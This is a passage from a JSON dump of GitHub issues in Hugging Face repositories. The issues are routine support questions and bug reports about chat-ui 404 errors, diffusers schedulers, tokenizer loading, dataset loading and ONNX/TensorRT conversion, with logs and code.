(file:///Users/user/Desktop/chat-ui/node_modules/openai/core.mjs:268:25)\r\n at OpenAI.makeRequest (file:///Users/user/Desktop/chat-ui/node_modules/openai/core.mjs:311:30)\r\n at process.processTicksAndRejections (node:internal/process/task_queues:95:5)\r\n at async eval (/Users/user/Desktop/chat-ui/src/lib/server/endpoints/openai/endpointOai.ts:111:36)\r\n at async Module.generateFromDefaultEndpoint (/Users/user/Desktop/chat-ui/src/lib/server/generateFromDefaultEndpoint.ts:11:23)\r\n at async generateTitle (/Users/user/Desktop/chat-ui/src/lib/server/textGeneration/title.ts:53:10)\r\n at async Module.generateTitleForConversation (/Users/user/Desktop/chat-ui/src/lib/server/textGeneration/title.ts:16:19)\r\n \"status\": 404,\r\n \"headers\": {\r\n \"connection\": \"keep-alive\",\r\n \"content-encoding\": \"gzip\",\r\n \"content-type\": \"text/plain; charset=utf-8\",\r\n \"date\": \"Mon, 09 Sep 2024 13:29:16 GMT\",\r\n \"transfer-encoding\": \"chunked\",\r\n \"vary\": \"Accept-Encoding\"\r\n }\r\n }\r\n[21:29:16.156] ERROR (15839): 404 status code (no body)\r\n err: {\r\n \"type\": \"NotFoundError\",\r\n \"message\": \"404 status code (no body)\",\r\n \"stack\":\r\n Error: 404 status code (no body)\r\n at APIError.generate (file:///Users/user/Desktop/chat-ui/node_modules/openai/error.mjs:50:20)\r\n at OpenAI.makeStatusError (file:///Users/user/Desktop/chat-ui/node_modules/openai/core.mjs:268:25)\r\n at OpenAI.makeRequest (file:///Users/user/Desktop/chat-ui/node_modules/openai/core.mjs:311:30)\r\n at process.processTicksAndRejections (node:internal/process/task_queues:95:5)\r\n at async eval (/Users/user/Desktop/chat-ui/src/lib/server/endpoints/openai/endpointOai.ts:111:36)\r\n at async Module.generate (/Users/user/Desktop/chat-ui/src/lib/server/textGeneration/generate.ts:8:30)\r\n at async textGenerationWithoutTitle (/Users/user/Desktop/chat-ui/src/lib/server/textGeneration/index.ts:62:3)\r\n \"status\": 404,\r\n \"headers\": {\r\n \"connection\": \"keep-alive\",\r\n \"content-encoding\": \"gzip\",\r\n \"content-type\": \"text/plain; charset=utf-8\",\r\n \"date\": \"Mon, 09 Sep 2024 13:29:16 GMT\",\r\n \"transfer-encoding\": \"chunked\",\r\n \"vary\": \"Accept-Encoding\"\r\n }\r\n }\r\n```\r\n\r\nAccessing through Postman alone is normal", "url": "https://github.com/huggingface/chat-ui/issues/1458", "state": "open", "labels": [ "support" ], "created_at": "2024-09-09T13:31:56Z", "updated_at": "2024-09-13T09:32:24Z", "comments": 2, "user": "nextdoorUncleLiu" }, { "repo": "huggingface/chat-ui", "number": 1456, "title": "could you provide an easy way to force output as json?", "body": "current I use\r\n\r\npreprompt:'only output json. Do not output anything that is not json. Do not use markdown format. Must begin with {.'\r\n\r\nBut llama is not smart enough to output json form. It always begin with Here is the JSON answer or begin with ```(markdown format) for give me unvalid json string.\r\n\r\nIt seems preprompt is not enough to force json format. Could you provide an easy way to output just json. Or maybe the method is in tools.", "url": "https://github.com/huggingface/chat-ui/issues/1456", "state": "open", "labels": [ "enhancement" ], "created_at": "2024-09-09T11:34:17Z", "updated_at": "2024-10-06T18:35:29Z", "comments": 1, "user": "ghost" }, { "repo": "huggingface/diffusers", "number": 9392, "title": "[Scheduler] Add SNR shift following SD3, would the rest of the code need to be modified?", "body": "**What API design would you like to have changed or added to the library? Why?**\r\n\r\nWith the increasing resolution of image or video generation, we need to introduce more noise at smaller T, such as SNR shift following SD3. I have observed that CogVideoX's schedule has already implemented [this](https://github.com/huggingface/diffusers/blob/main/src/diffusers/schedulers/scheduling_ddim_cogvideox.py#L214). If I add this line to the DDPM schedule, would the rest of the code (e.g., noise addition, sampling, etc.) need to be modified? I assume it wouldn't, but I seek a precise response.\r\n\r\n**What use case would this enable or better enable? Can you give us a code example?**\r\n\r\n```\r\nclass DDPMScheduler(SchedulerMixin, ConfigMixin):\r\n def __init__(snr_shift_scale, **kwarg)\r\n # predefine beta and alpha\r\n self.alphas_cumprod = self.alphas_cumprod / (snr_shift_scale + (1 - snr_shift_scale) * self.alphas_cumprod)\r\n # other code\r\n # Other functions are the same as before\r\n```\r\n\r\n", "url": "https://github.com/huggingface/diffusers/issues/9392", "state": "open", "labels": [ "stale" ], "created_at": "2024-09-09T09:19:37Z", "updated_at": "2025-01-05T15:05:04Z", "comments": 7, "user": "LinB203" }, { "repo": "huggingface/speech-to-speech", "number": 96, "title": "How to designate Melo TTS model to use my trained model? ", "body": "Hi,\r\n\r\nI am using Melo as TTS. And I trained with my datasets. How to designate Melo (here at speech to speech) to use my model?\r\n\r\nThanks!", "url": "https://github.com/huggingface/speech-to-speech/issues/96", "state": "closed", "labels": [], "created_at": "2024-09-08T20:36:23Z", "updated_at": "2024-09-10T14:42:58Z", "user": "insufficient-will" }, { "repo": "huggingface/huggingface_hub", "number": 2526, "title": "How can I rename folders in given repo? I need to rename folders ", "body": "### Describe the bug\n\nI am try to rename like below but it fails :/\r\n\r\n\r\n```\r\nfrom huggingface_hub import HfApi\r\nimport os\r\n\r\n# Initialize the Hugging Face API\r\napi = HfApi()\r\n\r\n# Set the repository name\r\nrepo_name = \"MonsterMMORPG/3D-Cartoon-Style-FLUX\"\r\n\r\n# Define the folder renaming mappings\r\nfolder_renames = {\r\n \"Training-Checkpoints-NO-Captions\": \"Training-Checkpoints-Inconsistent-DATASET-NO-Captions\",\r\n \"Training-Checkpoints-With-Captions\": \"Training-Checkpoints-Inconsistent-DATASET-With-Captions\"\r\n}\r\n\r\n# Function to rename folders\r\ndef rename_folder(repo_name, old_name, new_name):\r\n try:\r\n api.move_folder(\r\n repo_id=repo_name,\r\n path_in_repo=old_name,\r\n new_path=new_name,\r\n commit_message=f\"Rename folder '{old_name}' to '{new_name}'\"\r\n )\r\n print(f\"Successfully renamed '{old_name}' to '{new_name}'\")\r\n except Exception as e:\r\n print(f\"Error renaming '{old_name}' to '{new_name}': {str(e)}\")\r\n\r\n# Iterate through the folder renaming mappings and rename each folder\r\nfor old_name, new_name in folder_renames.items():\r\n rename_folder(repo_name, old_name, new_name)\r\n\r\nprint(\"Folder renaming process completed.\")\r\n```\n\n### Reproduction\n\n_No response_\n\n### Logs\n\n_No response_\n\n### System info\n\n```shell\nlatest\n```\n", "url": "https://github.com/huggingface/huggingface_hub/issues/2526", "state": "closed", "labels": [ "bug" ], "created_at": "2024-09-07T17:23:54Z", "updated_at": "2024-09-09T10:49:26Z", "user": "FurkanGozukara" }, { "repo": "huggingface/transformers", "number": 33359, "title": "[Docs] How to build offline HTML or Docset files for other documentation viewers?", "body": "### Feature request\n\nHow can I build the docs into HTML files for use with other documentation viewers like [Dash](https://www.kapeli.com/dash) , [Dash-User-Contributions](https://github.com/Kapeli/Dash-User-Contributions)?\r\n\r\nI successfully built the PyTorch docs for Dash by working directly in their `docs/` directory. I\u2019m wondering if a similar process exists for Hugging Face libraries.\n\n### Motivation\n\nThe Dash docset viewer is very useful for viewing multiple documentation sets in one place, even offline. It would be great to support it and include all Hugging Face libraries.\n\n### Your contribution\n\nI\u2019ve built the PyTorch docs for Dash, so I\u2019m familiar with incorporating and generating docsets.", "url": "https://github.com/huggingface/transformers/issues/33359", "state": "closed", "labels": [ "Documentation", "Feature request" ], "created_at": "2024-09-06T15:51:35Z", "updated_at": "2024-09-10T23:43:57Z", "user": "ueoo" }, { "repo": "huggingface/transformers", "number": 33343, "title": "How to install transformers==4.45, two or three days I can install successfully, but today cannot.", "body": "### System Info\n\ntorch2.2\n\n### Who can help?\n\n_No response_\n\n### Information\n\n- [ ] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [ ] My own task or dataset (give details below)\n\n### Reproduction\n\npip install git+https://github.com/huggingface/transformers.git\n\n### Expected behavior\n\nHow to install the latest transformers", "url": "https://github.com/huggingface/transformers/issues/33343", "state": "closed", "labels": [ "Installation", "bug" ], "created_at": "2024-09-06T08:23:00Z", "updated_at": "2024-10-16T08:04:10Z", "user": "HyacinthJingjing" }, { "repo": "huggingface/optimum-nvidia", "number": 149, "title": "How to use TensorRT model converter", "body": "Referring to [src/optimum/nvidia/export/converter.py] -> class 'TensorRTModelConverter' this could 'Take a local model and create the TRTLLM checkpoint and engine'\r\nQuestions:\r\n- What are applicable local model format? e.g. JAX, HuggingFace, DeepSpeed\r\n- How to use this script individually to generate TRTLLM checkpoint/engine? Could you please share if any tutorial?\r\n\r\nThank you.\r\n", "url": "https://github.com/huggingface/optimum-nvidia/issues/149", "state": "open", "labels": [], "created_at": "2024-09-05T18:55:15Z", "updated_at": "2024-09-05T18:55:15Z", "user": "FortunaZhang" }, { "repo": "huggingface/datasets", "number": 7139, "title": "Use load_dataset to load imagenet-1K But find a empty dataset", "body": "### Describe the bug\n\n```python\r\ndef get_dataset(data_path, train_folder=\"train\", val_folder=\"val\"):\r\n traindir = os.path.join(data_path, train_folder)\r\n valdir = os.path.join(data_path, val_folder)\r\n\r\n def transform_val_examples(examples):\r\n transform = Compose([\r\n Resize(256),\r\n CenterCrop(224),\r\n ToTensor(),\r\n ])\r\n examples[\"image\"] = [transform(image.convert(\"RGB\")) for image in examples[\"image\"]]\r\n return examples\r\n\r\n def transform_train_examples(examples):\r\n transform = Compose([\r\n RandomResizedCrop(224),\r\n RandomHorizontalFlip(),\r\n ToTensor(),\r\n ])\r\n examples[\"image\"] = [transform(image.convert(\"RGB\")) for image in examples[\"image\"]]\r\n return examples\r\n\r\n # @fengsicheng: This way is very slow for big dataset like ImageNet-1K (but can pass the network problem using local dataset)\r\n # train_set = load_dataset(\"imagefolder\", data_dir=traindir, num_proc=4)\r\n # test_set = load_dataset(\"imagefolder\", data_dir=valdir, num_proc=4)\r\n\r\n train_set = load_dataset(\"imagenet-1K\", split=\"train\", trust_remote_code=True) \r\n test_set = load_dataset(\"imagenet-1K\", split=\"test\", trust_remote_code=True)\r\n\r\n print(train_set[\"label\"])\r\n\r\n train_set.set_transform(transform_train_examples)\r\n test_set.set_transform(transform_val_examples)\r\n\r\n return train_set, test_set\r\n```\r\n above the code, but output of the print is a list of None:\r\n \r\n\"image\"\r\n\n\n### Steps to reproduce the bug\n\n1. just ran the code \r\n2. see the print\r\n\n\n### Expected behavior\n\nI do not know how to fix this, can anyone provide help or something? It is hurry for me\n\n### Environment info\n\n- `datasets` version: 2.21.0\r\n- Platform: Linux-5.4.0-190-generic-x86_64-with-glibc2.31\r\n- Python version: 3.10.14\r\n- `huggingface_hub` version: 0.24.6\r\n- PyArrow version: 17.0.0\r\n- Pandas version: 2.2.2\r\n- `fsspec` version: 2024.6.1", "url": "https://github.com/huggingface/datasets/issues/7139", "state": "open", "labels": [], "created_at": "2024-09-05T15:12:22Z", "updated_at": "2024-10-09T04:02:41Z", "comments": 2, "user": "fscdc" }, { "repo": "huggingface/datasets", "number": 7138, "title": "Cache only changed columns?", "body": "### Feature request\n\nCache only the actual changes to the dataset i.e. changed columns.\n\n### Motivation\n\nI realized that caching actually saves the complete dataset again.\r\nThis is especially problematic for image datasets if one wants to only change another column e.g. some metadata and then has to save 5 TB again.\n\n### Your contribution\n\nIs this even viable in the current architecture of the package?\r\nI quickly looked into it and it seems it would require significant changes.\r\n\r\nI would spend some time looking into this but maybe somebody could help with the feasibility and some plan to implement before spending too much time on it?", "url": "https://github.com/huggingface/datasets/issues/7138", "state": "open", "labels": [ "enhancement" ], "created_at": "2024-09-05T12:56:47Z", "updated_at": "2024-09-20T13:27:20Z", "comments": 2, "user": "Modexus" }, { "repo": "huggingface/lerobot", "number": 413, "title": "Compatible off-the-shelf robots?", "body": "Huge thanks for making all of this available!\r\n\r\nCan you recommend any (low-cost) off-the-shelf robots to work with?", "url": "https://github.com/huggingface/lerobot/issues/413", "state": "closed", "labels": [ "question" ], "created_at": "2024-09-05T10:21:24Z", "updated_at": "2025-10-08T08:27:56Z", "user": "danielfriis" }, { "repo": "huggingface/diffusers", "number": 9362, "title": "IndexError: index 29 is out of bounds for dimension 0 with size 29", "body": "### Describe the bug\r\n\r\nI have three problems because of the same reason. \r\n1) TypeError: unsupported operand type(s) for +=: 'NoneType' and 'int'\r\n # upon completion increase step index by one\r\n self._step_index += 1 <---Error [here](https://github.com/huggingface/diffusers/blob/main/src/diffusers/schedulers/scheduling_flow_match_euler_discrete.py#L303)\r\n2) IndexError: index 29 is out of bounds for dimension 0 with size 29\r\n sigma_next = self.sigmas[self.step_index + 1] <--- Error [here](https://github.com/huggingface/diffusers/blob/main/src/diffusers/schedulers/scheduling_flow_match_euler_discrete.py#L295)\r\n3) RuntimeError: Already borrowed\r\n if _truncation is not None:\r\n self._tokenizer.no_truncation() <--- Error here\r\n Example: https://github.com/huggingface/tokenizers/issues/537\r\nThe reason, as I understood, is threads. Do you know, how can I solve this problem?\r\n\r\n### Reproduction\r\n```\r\nfrom diffusers import (\r\n FluxPipeline,\r\n FlowMatchEulerDiscreteScheduler,\r\n)\r\nimport torch\r\n\r\npipeline = FluxPipeline.from_pretrained(\r\n \"black-forest-labs/FLUX.1-schnell\", torch_dtype=torch.bfloat16\r\n).to(\"cuda\")\r\n\r\nseed = 42\r\nheight = 720\r\nwidth = 1280\r\n\r\ngenerator = torch.Generator(device=\"cuda\").manual_seed(seed)\r\n\r\npipeline(\r\n prompt=prompt + \", highly detailed, all is depicted as silhouettes, without words\",\r\n guidance_scale=0.,\r\n # num_inference_steps=10,\r\n height=height,\r\n width=width,\r\n generator=generator,\r\n max_sequence_length=256,\r\n).images[0]\r\n```\r\n### Logs\r\n\r\n```shell\r\nFor example:\r\n Traceback (most recent call last):\r\n File \"/opt/conda/lib/python3.10/site-packages/flask/app.py\", line 1473, in wsgi_app\r\n response = self.full_dispatch_request()\r\n File \"/opt/conda/lib/python3.10/site-packages/flask/app.py\", line 882, in full_dispatch_request\r\n rv = self.handle_user_exception(e)\r\n File \"/opt/conda/lib/python3.10/site-packages/flask/app.py\", line 880, in full_dispatch_request\r\n rv = self.dispatch_request()\r\n File \"/opt/conda/lib/python3.10/site-packages/flask/app.py\", line 865, in dispatch_request\r\n return self.ensure_sync(self.view_functions[rule.endpoint])(**view_args) # type: ignore[no-any-return]\r\n File \"/app/main.py\", line 29, in generate_image\r\n image = imagegen.run(**data)\r\n File \"/app/image_generator.py\", line 102, in run\r\n return generate_image()\r\n File \"/app/image_generator.py\", line 89, in generate_image\r\n return self.pipeline(\r\n File \"/opt/conda/lib/python3.10/site-packages/torch/utils/_contextlib.py\", line 115, in decorate_context\r\n return func(*args, **kwargs)\r\n File \"/opt/conda/lib/python3.10/site-packages/diffusers/pipelines/flux/pipeline_flux.py\", line 734, in __call__\r\n latents = self.scheduler.step(noise_pred, t, latents, return_dict=False)[0]\r\n File \"/opt/conda/lib/python3.10/site-packages/diffusers/schedulers/scheduling_flow_match_euler_discrete.py\", line 295, in step\r\n sigma_next = self.sigmas[self.step_index + 1]\r\nTypeError: unsupported operand type(s) for +: 'NoneType' and 'int'\r\n```\r\n\r\n\r\n### System Info\r\n\r\n\r\n- \ud83e\udd17 Diffusers version: 0.31.0.dev0\r\n- Platform: Linux-5.4.0-171-generic-x86_64-with-glibc2.35\r\n- Running on Google Colab?: No\r\n- Python version: 3.10.13\r\n- PyTorch version (GPU?): 2.2.1 (True)\r\n- Flax version (CPU?/GPU?/TPU?): not installed (NA)\r\n- Jax version: not installed\r\n- JaxLib version: not installed\r\n- Huggingface_hub version: 0.24.6\r\n- Transformers version: 4.44.2\r\n- Accelerate version: 0.34.0\r\n- PEFT version: 0.12.0\r\n- Bitsandbytes version: not installed\r\n- Safetensors version: 0.4.4\r\n- xFormers version: not installed\r\n- Accelerator: NVIDIA RTX A6000, 46068 MiB\r\n- Using GPU in script?: \r\n- Using distributed or parallel set-up in script?: \r\n\r\n### Who can help?\r\n\r\n@yiyixuxu @sayakpaul @DN6", "url": "https://github.com/huggingface/diffusers/issues/9362", "state": "open", "labels": [ "bug", "stale" ], "created_at": "2024-09-04T11:02:49Z", "updated_at": "2024-11-25T15:04:22Z", "comments": 8, "user": "Anvarka" }, { "repo": "huggingface/tokenizers", "number": 1627, "title": "Rust: How to handle models with `precompiled_charsmap = null`", "body": "Hi guys,\r\nI'm currently working on https://github.com/supabase/edge-runtime/pull/368 that pretends to add a rust implementation of `pipeline()`. \r\n\r\nWhile I was coding the `translation` task I figured out that I can't load the `Tokenizer` instance for [Xenova/opus-mt-en-fr](https://huggingface.co/Xenova/opus-mt-en-fr) `onnx` model and their other `opus-mt-*` variants. \r\n\r\n
\r\nI got the following:\r\n\r\n```rust\r\nlet tokenizer_path = Path::new(\"opus-mt-en-fr/tokenizer.json\");\r\nlet tokenizer = Tokenizer::from_file(tokenizer_path).unwrap();\r\n```\r\n\r\n```\r\nthread 'main' panicked at /home/kalleby/.cargo/registry/src/index.crates.io-6f17d22bba15001f/tokenizers-0.20.0/src/normalizers/mod.rs:143:26:\r\nPrecompiled: Error(\"invalid type: null, expected a borrowed string\", line: 1, column: 28)\r\nstack backtrace:\r\n 0: rust_begin_unwind\r\n at /rustc/80eb5a8e910e5185d47cdefe3732d839c78a5e7e/library/std/src/panicking.rs:662:5\r\n 1: core::panicking::panic_fmt\r\n at /rustc/80eb5a8e910e5185d47cdefe3732d839c78a5e7e/library/core/src/panicking.rs:74:14\r\n 2: core::result::unwrap_failed\r\n at /rustc/80eb5a8e910e5185d47cdefe3732d839c78a5e7e/library/core/src/result.rs:1679:5\r\n 3: core::result::Result::expect\r\n at /rustc/80eb5a8e910e5185d47cdefe3732d839c78a5e7e/library/core/src/result.rs:1059:23\r\n 4: ::deserialize\r\n at /home/kalleby/.cargo/registry/src/index.crates.io-6f17d22bba15001f/tokenizers-0.20.0/src/normalizers/mod.rs:139:25\r\n 5: as serde::de::Visitor>::visit_some\r\n at /home/kalleby/.cargo/registry/src/index.crates.io-6f17d22bba15001f/serde-1.0.207/src/de/impls.rs:916:9\r\n 6: <&mut serde_json::de::Deserializer as serde::de::Deserializer>::deserialize_option\r\n at /home/kalleby/.cargo/registry/src/index.crates.io-6f17d22bba15001f/serde_json-1.0.124/src/de.rs:1672:18\r\n 7: serde::de::impls::>::deserialize\r\n at /home/kalleby/.cargo/registry/src/index.crates.io-6f17d22bba15001f/serde-1.0.207/src/de/impls.rs:935:9\r\n 8: as serde::de::DeserializeSeed>::deserialize\r\n at /home/kalleby/.cargo/registry/src/index.crates.io-6f17d22bba15001f/serde-1.0.207/src/de/mod.rs:801:9\r\n 9: as serde::de::MapAccess>::next_value_seed\r\n at /home/kalleby/.cargo/registry/src/index.crates.io-6f17d22bba15001f/serde_json-1.0.124/src/de.rs:2008:9\r\n 10: serde::de::MapAccess::next_value\r\n at /home/kalleby/.cargo/registry/src/index.crates.io-6f17d22bba15001f/serde-1.0.207/src/de/mod.rs:1874:9\r\n 11: as serde::de::Visitor>::visit_map\r\n at /home/kalleby/.cargo/registry/src/index.crates.io-6f17d22bba15001f/tokenizers-0.20.0/src/tokenizer/serialization.rs:132:55\r\n 12: <&mut serde_json::de::Deserializer as serde::de::Deserializer>::deserialize_struct\r\n at /home/kalleby/.cargo/registry/src/index.crates.io-6f17d22bba15001f/serde_json-1.0.124/src/de.rs:1840:31\r\n 13: tokenizers::tokenizer::serialization::>::deserialize\r\n at /home/kalleby/.cargo/registry/src/index.crates.io-6f17d22bba15001f/tokenizers-0.20.0/src/tokenizer/serialization.rs:62:9\r\n 14: ::deserialize::__Visitor as serde::de::Visitor>::visit_newtype_struct\r\n at /home/kalleby/.cargo/registry/src/index.crates.io-6f17d22bba15001f/tokenizers-0.20.0/src/tokenizer/mod.rs:408:21\r\n 15: <&mut serde_json::de::Deserializer as serde::de::Deserializer>::deserialize_newtype_struct\r\n at /home/kalleby/.cargo/registry/src/index.crates.io-6f17d22bba15001f/serde_json-1.0.124/src/de.rs:1723:9\r\n 16: tokenizers::tokenizer::_::::deserialize\r\n at /home/kalleby/.cargo/registry/src/index.crates.io-6f17d22bba15001f/tokenizers-0.20.0/src/tokenizer/mod.rs:408:21\r\n 17: serde_json::de::from_trait\r\n at /home/kalleby/.cargo/registry/src/index.crates.io-6f17d22bba15001f/serde_json-1.0.124/src/de.rs:2478:22\r\n 18: serde_json::de::from_str\r\n at /home/kalleby/.cargo/registry/src/index.crates.io-6f17d22bba15001f/serde_json-1.0.124/src/de.rs:2679:5\r\n 19: tokenizers::tokenizer::Tokenizer::from_file\r\n at /home/kalleby/.cargo/registry/src/index.crates.io-6f17d22bba15001f/tokenizers-0.20.0/src/tokenizer/mod.rs:439:25\r\n 20: transformers_rs::pipeline::tasks::seq_to_seq::seq_to_seq\r\n at ./src/pipeline/tasks/seq_to_seq.rs:51:21\r\n 21: app::main\r\n at ./examples/app/src/main.rs:78:5\r\n 22: core::ops::function::FnOnce::call_on", "url": "https://github.com/huggingface/tokenizers/issues/1627", "state": "open", "labels": [ "Feature Request" ], "created_at": "2024-09-04T08:33:06Z", "updated_at": "2024-10-06T15:34:06Z", "user": "kallebysantos" }, { "repo": "huggingface/optimum", "number": 2013, "title": "Is it possible convert decoder_model_merged.onnx to tensorrt via trtexec command ? ", "body": "At the first I convert whisper-tiny to onnx via optimum-cli\r\n`optimum-cli export onnx --model openai/whisper-tiny --task automatic-speech-recognition-with-past whisper-tiny-onnx`\r\n\r\nI got the some config, encoder and decoder_merged model\r\n\r\nthen I brought encoder and decoder_merged to convert to tensorrt via NGC version 23.09-py3, encoder not problem but decoder_merged got problem while converting.\r\n`trtexec --onnx=/workspace/models/whisper-tiny-onnx/decoder_model_merged.onnx --saveEngine=/workspace/models/whisper-tiny-onnx/decoder_model_merged.plan`\r\nthe error happen : \r\n`[5] Assertion failed: (node.output().size() <= static_cast(outputs.size())) && \"Node has more output tensors than TRT expected.\"`\r\n\r\n![\u0e2a\u0e01\u0e23\u0e35\u0e19\u0e0a\u0e47\u0e2d\u0e15 2024-09-04 005124](https://github.com/user-attachments/assets/c289f1fa-2174-4d8a-af68-ee9758a77c54)\r\n\r\n\r\nCan someone help me about this or Have another ways for good practice ? Please . . .", "url": "https://github.com/huggingface/optimum/issues/2013", "state": "closed", "labels": [], "created_at": "2024-09-03T17:52:40Z", "updated_at": "2024-09-15T10:16:34Z", "comments": 3, "user": "ccyrene" }, { "repo": "huggingface/lerobot", "number": 407, "title": "Multi-Image support for VQ-BeT", "body": "Hello, I wanted to ask if there is a possibility to have VQ-BeT running on multiple camera's for some environments that have different views, like Robomimic? If so can someone give me points on what exactly I need to change, I would be happy to submit a PR once I get it working on my side and finish the ICLR deadline! \r\n\r\nCurrently, if I understand correctly we need to change the `VQBeTRgbEncoder`, it seems like it supports multiple camera views but there is an [assert statement](https://github.com/huggingface/lerobot/blob/27ba2951d128a3db2497d1337031e01fb995ccfe/lerobot/common/policies/vqbet/modeling_vqbet.py#L745) that checks the length of the image views to be 1. Is there a specific reason for this assert statement, i.e., I need to change something else? ", "url": "https://github.com/huggingface/lerobot/issues/407", "state": "closed", "labels": [ "question", "policies" ], "created_at": "2024-09-03T17:00:23Z", "updated_at": "2025-10-08T08:27:39Z", "user": "bkpcoding" }, { "repo": "huggingface/optimum", "number": 2009, "title": "[Feature request] Add kwargs or additional options for torch.onnx.export", "body": "### Feature request\n\nIn `optimum.exporters.onnx.convert import export_pytorch`, there could be an option to add additional kwargs to the function which could be passed to the torch.onnx.export function.\n\n### Motivation\n\nIf such an option possible or will this ruin any of the other features, or is there a reason why there is no option available as of yet?\n\n### Your contribution\n\nCould contribute if this doesn't ruin any other features, or the current feature.", "url": "https://github.com/huggingface/optimum/issues/2009", "state": "open", "labels": [ "onnx" ], "created_at": "2024-09-03T13:52:50Z", "updated_at": "2024-10-08T15:27:26Z", "comments": 0, "user": "martinkorelic" }, { "repo": "huggingface/speech-to-speech", "number": 74, "title": "How to integrate it with frontend", "body": "Hi, What steps should I follow to create a web app UI and integrate it?\r\n\r\nMany thanks for considering my request.", "url": "https://github.com/huggingface/speech-to-speech/issues/74", "state": "open", "labels": [], "created_at": "2024-09-03T12:18:52Z", "updated_at": "2024-09-03T13:52:08Z", "user": "shrinivasait" }, { "repo": "huggingface/diffusers", "number": 9356, "title": "pipeline_stable_diffusion_xl_adapter", "body": "### Describe the bug\n\nI want to rewrite the call function of the pipeline_stable_diffusion_xl_adapter. When I want to use the function prepare_ip_adapter_image_embeds, there is an error called \"AttributeError: 'NoneType' object has no attribute 'image_projection_layers'\". The error tells me that the attribution self.unet.encoder_hid_proj is 'NoneType'. The pre-trianed model is 'stabilityai/stable-diffusion-xl-base-1.0'. Is there anything wrong when I use it? Thank you.\n\n### Reproduction\n\nmodel_path = 'stabilityai/stable-diffusion-xl-base-1.0'\r\nadapter = T2IAdapter.from_pretrained(\"TencentARC/t2i-adapter-openpose-sdxl-1.0\",)\r\nscheduler = DDPMScheduler.from_pretrained(model_path, subfolder=\"scheduler\")\r\npipe = AdapterPosePipeline.from_pretrained(model_path, adapter=adapter, torch_dtype=torch.float16, variant=\"fp16\", scheduler=scheduler).to(device)\r\n\r\n image_embeds = self.prepare_ip_adapter_image_embeds(\r\n image,\r\n ip_adapter_image_embeds,\r\n device,\r\n batch_size * num_images_per_prompt,\r\n self.do_classifier_free_guidance,\r\n )\n\n### Logs\n\n```shell\nroot@autodl-container-9d8d46936f-161f523c:~/autodl-tmp/COMP5704_Pose_Driven/src# python run.py\r\n/root/miniconda3/lib/python3.12/site-packages/xformers/ops/fmha/flash.py:211: FutureWarning: `torch.library.impl_abstract` was renamed to `torch.library.register_fake`. Please use that instead; we will remove `torch.library.impl_abstract` in a future version of PyTorch.\r\n @torch.library.impl_abstract(\"xformers_flash::flash_fwd\")\r\n/root/miniconda3/lib/python3.12/site-packages/xformers/ops/fmha/flash.py:344: FutureWarning: `torch.library.impl_abstract` was renamed to `torch.library.register_fake`. Please use that instead; we will remove `torch.library.impl_abstract` in a future version of PyTorch.\r\n @torch.library.impl_abstract(\"xformers_flash::flash_bwd\")\r\n/root/miniconda3/lib/python3.12/site-packages/controlnet_aux/mediapipe_face/mediapipe_face_common.py:7: UserWarning: The module 'mediapipe' is not installed. The package will have limited functionality. Please install it using the command: pip install 'mediapipe'\r\n warnings.warn(\r\nLoading pipeline components...: 100%|\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588| 7/7 [00:01<00:00, 4.87it/s]\r\n/root/miniconda3/lib/python3.12/site-packages/controlnet_aux/open_pose/body.py:34: FutureWarning: You are using `torch.load` with `weights_only=False` (the current default value), which uses the default pickle module implicitly. It is possible to construct malicious pickle data which will execute arbitrary code during unpickling (See https://github.com/pytorch/pytorch/blob/main/SECURITY.md#untrusted-models for more details). In a future release, the default value for `weights_only` will be flipped to `True`. This limits the functions that could be executed during unpickling. Arbitrary objects will no longer be allowed to be loaded via this mode unless they are explicitly allowlisted by the user via `torch.serialization.add_safe_globals`. We recommend you start setting `weights_only=True` for any use case where you don't have full control of the loaded file. Please open an issue on GitHub for any issues related to this experimental feature.\r\n model_dict = util.transfer(self.model, torch.load(model_path))\r\n/root/miniconda3/lib/python3.12/site-packages/controlnet_aux/open_pose/hand.py:14: FutureWarning: You are using `torch.load` with `weights_only=False` (the current default value), which uses the default pickle module implicitly. It is possible to construct malicious pickle data which will execute arbitrary code during unpickling (See https://github.com/pytorch/pytorch/blob/main/SECURITY.md#untrusted-models for more details). In a future release, the default value for `weights_only` will be flipped to `True`. This limits the functions that could be executed during unpickling. Arbitrary objects will no longer be allowed to be loaded via this mode unless they are explicitly allowlisted by the user via `torch.serialization.add_safe_globals`. We recommend you start setting `weights_only=True` for any use case where you don't have full control of the loaded file. Please open an issue on GitHub for any issues related to this experimental feature.\r\n model_dict = util.transfer(self.model, torch.load(model_path))\r\n/root/miniconda3/lib/python3.12/site-packages/controlnet_aux/open_pose/face.py:325: FutureWarning: You are using `torch.load` with `weights_only=False` (the current default value), which uses the default pickle module implicitly. It is possible to construct malicious pickle data which will execute arbitrary code during unpickling (See https://github.com/pytorch/pytorch/blob/main/SECURITY.md#untrusted-models for more details). In a future release, the default value for `weights_only` will be flipped to `True`. This limits the functions that could be executed during unpickling.", "url": "https://github.com/huggingface/diffusers/issues/9356", "state": "open", "labels": [ "bug", "stale" ], "created_at": "2024-09-03T10:25:57Z", "updated_at": "2024-10-28T15:03:18Z", "comments": 6, "user": "Yuhan291" }, { "repo": "huggingface/diffusers", "number": 9352, "title": "Text generation?", "body": "Hi thanks for this great library!\r\n\r\nThere seems to be some diffusion models that generate text, instead of images. (For example, these two surveys: https://arxiv.org/abs/2303.06574, https://www.semanticscholar.org/paper/Diffusion-models-in-text-generation%3A-a-survey-Yi-Chen/41941f072db18972b610de9979e755afba35f11e). Therefore, it would be great if 